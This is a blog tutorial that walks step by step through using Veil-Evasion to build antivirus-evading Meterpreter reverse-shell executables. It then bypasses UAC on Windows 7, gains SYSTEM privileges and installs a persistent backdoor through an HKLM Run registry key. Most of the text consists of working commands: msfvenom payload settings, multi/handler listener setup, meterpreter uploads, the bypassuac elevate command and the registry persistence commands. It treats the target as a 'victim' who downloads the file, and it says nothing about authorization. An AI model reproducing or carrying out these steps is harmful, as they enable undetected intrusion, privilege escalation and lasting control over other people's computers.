metasploit

 

 

Last time i explained about veil-Evasion to create a undetectable payload and get away from the eyes of antivirus. Today i am going to use the Same Veil-Evasion technique to create a payloads and Bypass UAC in windows 7 more effectively to get Admin Priviliges.

 

 

For that we need Veil-Evasion tool to generate two payloads executables that bypass antivirus. For installing Veil-Evasion tool follow by previous post  Evading-Antivirus.

 

 

After Veil-Evasion is installed, just run the script inside the Veil-Evasion directory.

 

 

#./Veil-Evasion.py

 

 

After executing Veil-Evasion.py python script. The Veil window will appear. You see that today it has 31 payloads:

 

 

You can obtain a list of all the payloads with the “list” command:

 

 

Screenshot from 2014-06-19 19:46:14

 

Screenshot from 2014-06-19 19:46:27

 

 

[>] Please enter a command: list

 

[>] Please enter a command: use 27

 

[>] Please enter a command: set use_pyherion Y

 

 

 

PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.

 

 

I am going to use the python/b64_substitution payload, so I type “use 27” and press Enter. It loads that component, as shown below:

 

 

[>] Please enter a command: generate

 

 

Screenshot from 2014-06-19 19:47:07

 

 

After giving generate command, Then it’s necessary to wait while the shellcode is been generated.

 

 

Now we are going to select msfvenom typing “1”

 

[>] Please enter the number of your choice : 1

 

 

After that we need to type some details:

 

 

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

 

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20″

 

Enter value for ‘LPORT’: “8080”

 
Screenshot from 2014-06-19 19:47:44

 

 

You need to press enter and then Veil requests us the name of our payload. In this tutorial we going to Evade Antivirus and Bypass UAC in windows 7, so we need to create two payloads using Veil. For the first payload i name it as setup1

 

We are going to use Pyinstaller. It will create a setup1.exe installable. For this, we are going to type “1″

 

 

[>] Please enter the number of your choice : 1

 

Next, I issue the “generate” command and press enter to create the executable.

 

 

Screenshot from 2014-06-19 19:48:38

 

 

Screenshot from 2014-06-19 19:48:56

 

 

Like the above one, we need to create our second payload with same options except the LPORT. The second payload must be listen on some other ports, for that i used port 8081 and generated it with the name setup2

 

 

Screenshot from 2014-06-19 19:49:51

 

Screenshot from 2014-06-19 19:50:21

 

 

Finally we had two payloads setup1.exe and setup2.exe listening for the ports 8080 and 8081.

 

 

 

Now we have a working executables, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse connections.

 

 

#msfconsole

 

#msf > use exploit/multi/handler

 

#msf exploit(handler) > show options

 

#msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

 

#msf exploit(handler) > set LHOST 192.168.31.20

 

#msf exploit(handler) > set LPORT 8080

 

We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go.

 

#msf exploit(handler) > exploit

 

 

 

Once the victim has downloaded the file and has executed it on his computer then you will see the responses on your computer.

 

After gain an access to the target system, usually you only act as logged user and it’s not a local system account.

 

This picture below taken when hacked successfully gain an access using Payload create by using Veil and successfully evaded by AV, that did not detected my payload.

 

Screenshot from 2014-06-21 21:27:32

 

 

Screenshot from 2014-06-21 21:44:10

 

Screenshot from 2014-06-21 22:14:25

 

 

 

#meterpreter > getuid

 

When running getuid command, we know that we running as user that already logged in to the system but we didn’t act as system account. This users session only has limited user rights. This can severely limit actions you can perform on the remote system such as dumping passwords, manipulating the registry, installing backdoors, etc.

 

It’s time to use our second payload setup2.exe ,so we need to upalod the setup2.exe payload and bypassuac-x86.exe found in directory /opt/metasploit/apps/pro/msf3/data/post/bypassuac-x86.exe  in kali linux.

 

 

Bypassuac.exe is use to bypass UAC in windows 7 and elevate the current user to get the admin privileges.

 

 

So we upload both the files bypassuac-x64.exe or bypassuac-x86.exe depending upon the victims OS whether it is 64-bit or 32-bit and setup2.exe in the victims machine through meterperter session.

 

 

 

#meterpreter > upload /root/veil-output/compiled/setup2.exe C:\\users\\public

 

#meterpreter > upload /opt/metasploit/apps/pro/msf3/data/post/bypassuac-x86.exe C:\\users\\public

 

#meterpreter > shell

After getting a command prompt of windows machine, move to the users\public folder and execute the following command to elevate and bypass UAC.

 

 

C: > cd \Users\Public
Before elevation, we need to set our metaspoit to listen for meterperter reverse tcp connection in port 8081

 

 

#msfconsole

 

#msf > use exploit/multi/handler

 

#msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

 

#msf exploit(handler) > set LHOST 192.168.31.20

 

#msf exploit(handler) > set LPORT 8081

 

#msf exploit(handler) > exploit

 

 

Now return back to session of command prompt in meterperter created by our first payload setup1.exe.

 

C:\Users\Public > bypassuac-x86.exe elevate /c c:\users\public\setup2.exe

 

 

 

Screenshot from 2014-06-21 22:07:55

 

Screenshot from 2014-06-21 22:21:18

 

 

Matching handler should be in the listening state. Once you get the meterpreter session, run the getsystem command and it should give you SYSTEM

 

#meterpreter > getsystem

 

#meterpreter > getprivs

 

By running getprivs it will list the privilege of current users and luckly we having SYSTEM privileges.

 

Screenshot from 2014-06-20 11:55:50

 

 

Now we going to use this second payload setup2.exe as a backdoor to access this machine anytime we want, for that i add this exe file in registry of the system to automatically start when the system is ON.

 

So i again upload my setup2.exe in system32 folder of victims machine. this time we had SYSTEM privileges so had rights to access windows c drive.

 

#meterpreter > upload /home/sathish/setup2.exe C:\\Windows\\System32

 

#meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v setup2 -d C:\\Windows\\System32\setup2.exe

 

#meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v setup2

 

#meterperter > reboot

 

Screenshot from 2014-06-21 22:47:45

 

After the victims machine reboot, again we got a meterperter reverse tcp connection in port 8081 our host.

Advertisements